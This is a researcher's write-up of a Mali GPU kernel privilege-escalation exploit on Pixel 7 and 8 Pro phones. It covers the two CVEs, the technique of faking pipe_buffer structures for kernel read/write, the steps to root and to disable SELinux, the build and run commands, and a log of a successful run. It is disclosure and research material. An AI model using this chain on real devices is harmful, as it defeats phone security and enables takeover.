Awesome
Mali GPU Kernel LPE
This article provides an in-depth analysis of two kernel vulnerabilities within the Mali GPU, reachable from the default application sandbox, which I independently identified and reported to Google. It includes a kernel exploit that achieves arbitrary kernel r/w capabilities. Consequently, it disables SELinux and elevates privileges to root on Google Pixel 7 and 8 Pro models running the following Android 14 versions:
- Pixel 8 Pro:
google/husky/husky:14/UD1A.231105.004/11010374:user/release-keys
- Pixel 7 Pro:
google/cheetah/cheetah:14/UP1A.231105.003/11010452:user/release-keys
- Pixel 7 Pro:
google/cheetah/cheetah:14/UP1A.231005.007/10754064:user/release-keys
- Pixel 7:
google/panther/panther:14/UP1A.231105.003/11010452:user/release-keys
(by m4b4 (Marcel))
Vulnerabilities
This exploit leverages two vulnerabilities: an integer overflow resulting from an incomplete patch in the gpu_pixel_handle_buffer_liveness_update_ioctl
ioctl command, and an information leak within the timeline stream message buffers.
Buffer Underflow in gpu_pixel_handle_buffer_liveness_update_ioctl() Due to Incorrect Integer Overflow Fix
Google addressed an integer overflow in the gpu_pixel_handle_buffer_liveness_update_ioctl
ioctl command in this commit. At first, when I reported this issue, I thought the bug was caused by an issue in the patch described earlier. After reviewing the report, I came to the realization that my analysis of the a vulnerability was inaccurate. Despite my first assumption of the patch being incomplete, it effectively resolves and prevents an underflow in the calculation. This lead me to suspect that the change wasn't applied in the production builds. However, although I can cause an underflow in the calculation, it is not possible to cause an overflow. This suggests that the ioctl command has been partially fixed, although not with the above patch shown above. Looking at IDA revealed that another incomplete patch was shipped in the production releases, and this patch is not present in any git branch of the mali gpu kernel module.
This vulnerability was first discovered in the latest Android version and reported on November 19, 2023. Google later informed me that they had already internally identified it and had assigned it CVE-2023-48409 in the December Android Security Bulletin, labeling it as a duplicate issue. Although I was able to verify that the bug had been internally identified months prior to my report, (based on the commit date around August 30) there remains confusion. Specifically, it's strange that the Security Patch Levels (SPL) for October and November of the most recent devices were still affected by this vulnerability —I haven't investigated versions prior to these. Therefore, I am unable to conclusively determine whether this was truly a duplicate issue and if the appropriate patch was indeed scheduled for December prior to my submission or if there was an oversight in addressing this vulnerability.
Anyway, what makes this bug powerful is the following:
- The buffer
info.live_ranges
is fully user-controlled. - The overflowing values are user-controlled input, thereby, we can overflow the calculation so the
info.live_ranges
pointer can be at an arbitrary offset prior to the start of thebuff
kernel address. - The allocation size is also user controlled input, which gives the ability to request a memory allocation from any general-purpose slab allocator.
This vulnerability shares similarities with the DeCxt::RasterizeScaleBiasData() Buffer underflow vulnerability I found and exploited in the iOS 15 kernel back in 2022.
Leakage of Kernel Pointers in Timeline Stream Message Buffers
The GPU Mali implements a custom timeline stream
designed to gather information, serialize it, and subsequently write it to a ring buffer following a specific format. Users can invoke the ioctl command kbase_api_tlstream_acquire
to obtain a file descriptor, enabling them to read from this ring buffer. The format of the messages is as follows:
- A packet header
- A message id
- A serialized message buffer, where the specific content is contingent upon the message ID.
For example, the
__kbase_tlstream_tl_kbase_kcpuqueue_enqueue_fence_wait
function serializes thekbase_kcpu_command_queue
anddma_fence
kernel pointers into the message buffer, resulting in leaking kernel pointers to user space process.
void __kbase_tlstream_tl_kbase_kcpuqueue_enqueue_fence_wait(
struct kbase_tlstream *stream,
const void *kcpu_queue,
const void *fence
)
{
const u32 msg_id = KBASE_TL_KBASE_KCPUQUEUE_ENQUEUE_FENCE_WAIT;
const size_t msg_size = sizeof(msg_id) + sizeof(u64)
+ sizeof(kcpu_queue)
+ sizeof(fence)
;
char *buffer;
unsigned long acq_flags;
size_t pos = 0;
buffer = kbase_tlstream_msgbuf_acquire(stream, msg_size, &acq_flags);
pos = kbasep_serialize_bytes(buffer, pos, &msg_id, sizeof(msg_id));
pos = kbasep_serialize_timestamp(buffer, pos);
pos = kbasep_serialize_bytes(buffer,
pos, &kcpu_queue, sizeof(kcpu_queue));
pos = kbasep_serialize_bytes(buffer,
pos, &fence, sizeof(fence));
kbase_tlstream_msgbuf_release(stream, acq_flags);
}
The proof of concept exploit leaks the kbase_kcpu_command_queue
object address by monitoring to the message id KBASE_TL_KBASE_NEW_KCPUQUEUE
which is dispatched by the kbasep_kcpu_queue_new
function whenever a new kcpu queue object is allocated.
Google informed me that the vulnerability was reported in March 2023 and was assigned CVE-2023-26083 in their security bulletin. Nonetheless, I was able to replicate the issue on the latest Pixel devices shipped with the Security Patch Levels (SPL) for October and November, indicating that the fix had not been applied correctly or at all. Subsequently, Google quickly addressed the issue in the December Security Update Bulletin without offering credit, and later informed me that the issue was considered a duplicate. The rationale behind labeling this issue as a duplicate, however, remains questionable.
Exploitation
So I have two interesting vulnerabilities. The first one offers a powerful capability to modify the content of any 16-byte aligned kernel address that comes before the allocated buff address. The second vulnerability provides hints into the potential locations of objects within the kernel memory.
Notes on buffer_count and live_ranges_count Values
With total control over the buffer_count
and live_ranges_count
fields, I have the flexibility to select the target slab and the precise offset I intend to write to. However, selecting values for buffer_count
and live_ranges_count
requires careful consideration due to several constraints and factors:
- Both values are related, and the overflow will occur only if all the newly introduced checks are bypassed.
- The requirement for the negative offset to be 16-bytes aligned restricts the ability to write to any chosen location. However, this is generally not a significant hindrance.
- Opting for a larger offset leads to a large amount of data being written to areas of memory that may not be intended targets. For instance, if the allocation size overflows to
0x3004
, thelive_ranges
pointer would be set to-0x4000
bytes from thebuff
object's allocated space. Thecopy_from_user
function would then write0x7004
bytes, based on the calculation ofupdate->live_ranges_count
times 4. Consequently, this operation would result in user-controlled data overwriting the memory area between thelive_ranges
pointer and thebuff
allocation. It is essential, therefore, to carefully ensure that no critical system objects within that range are accidentally overwritten. Given that the operation involves acopy_from_user
call, one might consider triggering anEFAULT
by deliberately un-mapping the undesired memory region following the user source buffer to prevent data from being written to sensitive locations. However, this approach is ineffective, that's because if theraw_copy_from_user
function fails, it will zero out the remaining bytes in the destination kernel buffer. This behavior is implemented to ensure that in case of a partial copy due to an error, the rest of the kernel buffer does not contain uninitialized data.
static inline __must_check unsigned long
_copy_from_user(void *to, const void __user *from, unsigned long n)
{
unsigned long res = n;
might_fault();
if (!should_fail_usercopy() && likely(access_ok(from, n))) {
instrument_copy_from_user(to, from, n);
res = raw_copy_from_user(to, from, n);
}
if (unlikely(res))
memset(to + (n - res), 0, res);
return res;
}
Considering this, we need to carefully select the object to overwrite and the data to write.
Choosing the Right Object to Overwrite
Because I’m stuck with this unfortunate check, my strategy is to identify an object that, if nulled out, will not produce any undesired outcome. But, before I get to that, there's another issue to deal with. Remember when I said in the last part that I can choose any allocation size and thus any general purpose slab cache allocator to service my allocation buffer? That’s not correct, because it is because of copy_from_user
again! It is due to the CONFIG_HARDENED_USERCOPY mitigation. It forbids specifying a size that does not meet the corresponding slab cache size where the kernel destination buffer corresponds (in this case) of a heap object. It determines whether the buffer's page is a slab page, and if so, it retrieves the matching kmem_cache->size
and determines whether the user supplied size will not exceed it; otherwise, the kernel just crashes due to the size mismatch. So, in other words, I cannot target objects that belong to the general purpose allocator, BUT I can still target objects that have large sizes (i.e. those served directly by the page allocator).
The first thought that came to mind was to use the pipe_buffer
technique, which is a very elegant technique to obtain arbitrary read/write primitives. I won't go into detail about the technique, but readers are encouraged to read this fantastic blog from Interrupt Labs. When constructing a pipe object, the pipe_buffer
object is initially created in an array of 16 elements; however, the array size can be adjusted using fcntl(F_SETPIPE_SZ)
. Therefore, the pipe_buffer
array allocation can be adjusted such that it can be served from the page allocator, making it a perfect target object to attack.
After selecting the pipe_buffer object as a target candidate, the next step toward achieving kernel r/w is to overwrite its content with the underflow vulnerability, which will allow me to read/write from/to any memory location whose page is overwriting the pipe_buffer->page
field.
Because the vulnerability allows me to write arbitrary data, I can control the whole content of 'pipe_buffer
,' including its page field, and to do so, I need to allocate the pipe_buffer
array before the vulnerable kbuff
object and they have to be next to each other.
Positioning pipe_buffer and buff Objects Adjacently
I sprayed the kernel memory with a lot of kbase_kcpu_command_queue
objects then followed by a bunch of pipe_buffer
arrays.
I can’t just use the pipe_buffer
arrays alone as a primary source for spraying due to the limitation imposed by pipe_max_size
. Therefore, I decided to start spraying with the kbase_kcpu_command_queue
object. Choosing the kbase_kcpu_command_queue
object was for two reasons: its allocation size is 0x38C8
thus handled by the page allocator, and I can deterministically obtain its kernel address using the information kernel leak bug, making it a good object to spray with as well as a good object to target (as we’ll see in the next section).
As mentioned before, I used fcntl(F_SETPIPE_SZ)
to increase the size of the pipe_buffer
array allocation so that it can be served by the page allocator. To be more specific, I chose the allocation size to be a ==0x4000 bytes (4 * PAGE_SIZE)== in order to be consistent with the kbase_kcpu_command_queue
allocations.
Obtaining a struct page Address
In order to properly use the pipe_buffer
, a page address is required. Being able to identify the kernel address of a kbase_kcpu_command_queue
object that I can deliberately create and destroy makes it a good candidate to use and finding its matching struct page
can be achieved by using the virt_to_page
.
Contents to Write in the pipe_buffer
So the pipe_buffer
object is as follow:
struct pipe_buffer {
struct page *page;
unsigned int offset, len;
const struct pipe_buf_operations *ops;
unsigned int flags;
unsigned long private;
};
As previously mentioned, the page
field must include a valid page address. The offset
and len
fields must not exceed PAGE_SIZE
, otherwise the pipe will increase the head/tail counters, resulting in the use of a new pipe_buffer
object and loss of control over the fake pipe buffer.
Also, the flags
must be PIPE_BUF_FLAG_CAN_MERGE
so the following pipe_write
calls instead of blindly incrementing the head counter and using the next pipe buffer, it first checks whether there’s a space in the current pipe_buffer
that will fit the write request or not, and if there is, it will simply append data to the same pipe buffer starting from the value stored at the len
field.
In order to avoid crashing the device at pipe_buf_confirm
, which is called by pipe_write
and pipe_read
’, the ops
pointer must also be a valid kernel address with a ops->confirm
field set to NULL. I can simply use an offset within the leaked kbase_kcpu_command_queue
object that is NULL and will not change under any circumstances.
Choosing the Optimal Offset Value for Underflow
While the allocation sizes of the buff
,kbase_kcpu_command_queue
and pipe_buffer
are 0x4000 bytes, I chose to underflow the buffer with 0x8000 bytes. why ?
Let's take a brief look at how pipe_buffers
are updated during read and write operations. Assume we can shape the pipe_buffer
to look like this:
struct pipe_buffer {
.page = virt_to_page(addr),
.offset = 0,
.len = 0x40,
.ops = kcpu_addr + 0x50,
.flags = PIPE_BUF_FLAG_CAN_MERGE,
unsigned long private = 0
};
While the bug gives the ability to arbitrary control this content of this object, it only does so once because the underflowed object is freed immediately after the ioctl
call finishes. This actually poses a problem because I need to manually update the pipe_buffer
object to make it useable again since each pipe read/write operation:
- The
.page
field is not updated; it remains the same, and when the buffer is empty, it is released, which I do not want to happen because the.ops
field is not correctly set. - Because the
pipe_buffer
updates the.offset
field on a read operation, therefore, I cannot read the same memory region again. - The data written to the
pipe_buffer
will be appended to the buffer starting from the.len
value (assuming thatPIPE_BUF_FLAG_CAN_MERGE
flag is set) and the.len
is updated accordingly. That is, we can't write data into the exact address twice.
As a result, unless I properly update the pipe_buffer
after each read or write operation, I cannot read and write from/to the same pipe at the same time. That's why underflowing with 0x8000
bytes is much more practical, because instead of overwriting a single pipe_buffer
, I'll overwrite two distinct pipe_buffer instances of two distinct pipes objects: one for will be considered for read and the other for write operations.
#define PIPE_BUF_FLAG_CAN_MERGE 0x10 /* can merge buffers */
pipe_read = (struct pipe_buffer *)( ptr);
pipe_read->page = virt_to_page(ta->kcpu_kaddr);
pipe_read->offset = 0;
pipe_read->len = 0xfff;
pipe_read->ops = (const void *)(ta->kcpu_kaddr + 0x50);
pipe_read->flags = PIPE_BUF_FLAG_CAN_MERGE;
pipe_read->private = 0;
pipe_write = (struct pipe_buffer *)( ptr + 0x4000);
pipe_write->page = virt_to_page(ta->kcpu_kaddr);
pipe_write->offset = 0;
pipe_write->len = 0; /* This is the starting position of the pipe_write */
pipe_write->ops = (const void *)(ta->kcpu_kaddr + 0x50);
pipe_write->flags = PIPE_BUF_FLAG_CAN_MERGE;
pipe_write->private = 0;
The pipe_read
is a fake pipe buffer that will be used for reading data from the target page starting at .offset = 0
up to 0xfff
bytes, whereas pipe_write
is a fake pipe_buffer
that will be used for writing data starting from .len = 0
up to 0xfff
bytes.
It's also very important to mention again that writing more than PAGE_SIZE
bytes will push the pipe to increment the head counter, therefore using a fresh newly allocated pipe_buffer
and losing control over our fake pipe_write
. In the other hand, emptying (reading 0xfff data from) fake_read
buffer tells the kernel to release the actual page by calling ops→release
causing the kernel to crash because I still don’t have a kernel text address.
Although I managed to segregate the pipe read and write operations so that performing a write in one pipe end will not interfere with the other pipe buffer and vice versa, I still haven’t solved the core issue: How to reliably update the pipe buffer? The obvious answer came to mind was just to repeat the spray process again and again after each pipe read or write call. And this makes no sense because it would have had a significant impact on exploit reliability. In the following section, I will divide the goal into two sub-goals: to begin, I'll focus on the .page
field only, followed by the .len/.offset
fields afterward.
Modifying the pipe_buffer→page Field
To my surprise, I don't have or need to update the .page
at all, that's because I can overwrite the pipe_buffer→page
to point to the page address of the leaked kbase_kcpu_command_queue
. Therefore, **All I need to do is release the kbase_kcpu_command_queue
object and overlap it with a new pipe_buffer
object. Yup! Now I have a pipe_buffer→page
that points to a legitimate pipe_buffer
object!
Replacing kbase_kcpu_command_queue
with pipe_buffer
gives us the ability to manipulate a legitimate pipe buffer without regularly having to update the .page
field. However, I still have to deal with the .len
and .offset
fields.
Modifying the pipe_buffer→len/offset Fields
As I've mentioned earlier, doing pipe read/write updates the .len
and .offset
fields, rendering subsequent read/write operations on the same page unusable, even if performed over the two distinct pipes. Here's another trick: there's a technique to read/write data without even touching the .len/.offset
fields!. And it is possible to achieve this by faulting copy_page_from_iter
and copy_page_to_iter
calls on pipe_read/write
! Yes, just like copy_to/from_user
, copy_page_to/from_iter
copies data from/to user-space that is passed through the iov_iter
structure, and it can be faulted.
To continue with the previous example, if we wish to write 8 bytes of data to an address, the provided user space buffer size must be 8, followed by an unmapped or non-readable area of memory, and then pass 9
as a size argument to the write
system call, indicating the amount of data that we want to write.This operation will write 8 bytes and fail on the ninth because it encounters an unmapped/unread memory location. As a result, the data has been effectively written to the destination kernel buffer and the.len
field has not been modified. The pipe_write
kernel function will just return without updating the buf->len
field.
if ((buf->flags & PIPE_BUF_FLAG_CAN_MERGE) &&
offset + chars <= PAGE_SIZE) {
ret = pipe_buf_confirm(pipe, buf);
if (ret)
goto out;
ret = copy_page_from_iter(buf->page, offset, chars, from);
if (unlikely(ret < chars)) {
ret = -EFAULT;
goto out;
}
buf->len += ret;
if (!iov_iter_count(from))
goto out;
}
The same is true for read operations; if we wish to read 8 bytes, make the ninth byte of the buffer unreadable then just claim that we want to read 9 bytes, the data will be copied to the user buffer without changing the .offset
field.
As a result, we are able to perform unlimited read/write operations on any kernel memory address without having to recurrently go through the spray process.
Getting root
Now that I have a strong arbitrary read/write primitive, I just looked through all the struct page
in the VMEMMAP_START
array to determine the kernel text starting address using the technique outlined in the Interrupt Labs blog post. Then I realized that init_task
is nulled out in Android November Security Updates, so I just used kthreadd_task
instead. Having kthreadd_task
kernel address allowed me to walk the task->tasks
list and obtain my own current
task kernel address, then zero out the cred
structure to achieve root privileges.
Later, I realized scanning all the page addresses was unnecessary because I already had the anon_pipe_buf_ops kernel text address from a pipe_buffer object. With this information, I could deduce the kernel text base address, effectively bypassing KASLR.
Disable SELinux
The exploit disables SELinux also, with the kernel text base address, I just need to find the selinux_state
global structure location and then zero out the .enforcing
value.
Proof of Concept
The proof of concept accompanying the report was tested on Pixel 7 and 8 Pro devices running Android 14 with the October and November ASBs, achieving a success rate of nearly 100%. It's also important to mention that the exploit will not work out of the box in other devices due to the use of some hardcoded offsets. In order to add support for a new device, one must have to provide the following:
kthreadd_task
offset from the kernel base address.selinux_state
offset from the kernel base address.task_struct->cred
,task_struct->pid
andtask_struct->tasks
structure offsets.anon_pipe_buf_ops
offset from the kernel base address.
Compilation
To compile the exploit as a standalone binary use the following command, then use adb shell
to run it:
$ aarch64-linux-androidXX-clang++ -static-libstdc++ -w -Wno-c++11-narrowing -DUSE_STANDALONE -o poc poc.cpp -llog
$ adb push poc /data/local/tmp/
$ adb shell /data/local/tmp/poc
You can also run the exploit via an Android Studio App by embeding this directory with it and make sure to disable the useless C++ warnings by adding -w -Wno-c++11-narrowing
to the cmake file.
Demo
$ adb logcat |grep -i EXPLOIT
11-28 16:04:12.500 7989 7989 E EXPLOIT : [+] Target device: 'google/husky/husky:14/UD1A.231105.004/11010374:user/release-keys' 0xa9027bfdd10203ff 0xa90467faa9036ffc
11-28 16:04:15.563 7989 7989 E EXPLOIT : [+] Got the kcpu_id (0) kernel address = 0xffffff8901390000 from context (0x0)
11-28 16:04:18.441 7989 7989 E EXPLOIT : [+] Got the kcpu_id (255) kernel address = 0xffffff89b0bf8000 from context (0xff)
11-28 16:04:18.442 7989 7989 E EXPLOIT : [+] Found corrupted pipe with size 0xfff
11-28 16:04:18.442 7989 7989 E EXPLOIT : [+] SUCCESS! we have a fake pipe_buffer (0)!
11-28 16:04:18.444 7989 7989 E EXPLOIT : 10 00 39 01 89 FF FF FF 10 00 39 01 89 FF FF FF | ..9.......9.....
11-28 16:04:18.444 7989 7989 E EXPLOIT : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
11-28 16:04:18.444 7989 7989 E EXPLOIT : 00 B0 CD 12 C0 FF FF FF 00 00 00 00 00 00 00 00 | ................
11-28 16:04:18.444 7989 7989 E EXPLOIT : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
11-28 16:04:18.445 7989 7989 E EXPLOIT : [+] Freeing kcpu_id = 0 (0xffffff8901390000)
11-28 16:04:18.446 7989 7989 E EXPLOIT : [+] Allocating 61 pipes with 256 slots
11-28 16:04:18.462 7989 7989 E EXPLOIT : [+] Successfully overlapped the kcpuqueue object with a pipe buffer
11-28 16:04:18.463 7989 7989 E EXPLOIT : 40 AB BA 26 FE FF FF FF 00 00 00 00 30 00 00 00 | @..&........0...
11-28 16:04:18.463 7989 7989 E EXPLOIT : 70 37 8D F1 DA FF FF FF 10 00 00 00 00 00 00 00 | p7..............
11-28 16:04:18.463 7989 7989 E EXPLOIT : 00 00 00 00 00 00 00 00 | ........
11-28 16:04:18.463 7989 7989 E EXPLOIT : [+] pipe_buffer {.page = 0xfffffffe26baab40, .offset = 0x0, .len = 0x30, ops = 0xffffffdaf18d3770}
11-28 16:04:18.463 7989 7989 E EXPLOIT : [+] kernel base = 0xffffffdaf0010000, kthreadd_task = 0xffffff8002da3780 selinux_state = 0xffffffdaf28a3168
11-28 16:04:20.097 7989 7989 E EXPLOIT : [+] Found our own task struct 0xffffff88416c5c80
11-28 16:04:20.097 7989 7989 E EXPLOIT : [+] Successfully got root: getuid() = 0 getgid() = 0
11-28 16:04:20.097 7989 7989 E EXPLOIT : [+] Successfully disabled SELinux
11-28 16:04:20.102 7989 7989 E EXPLOIT : [+] Cleanup ... OK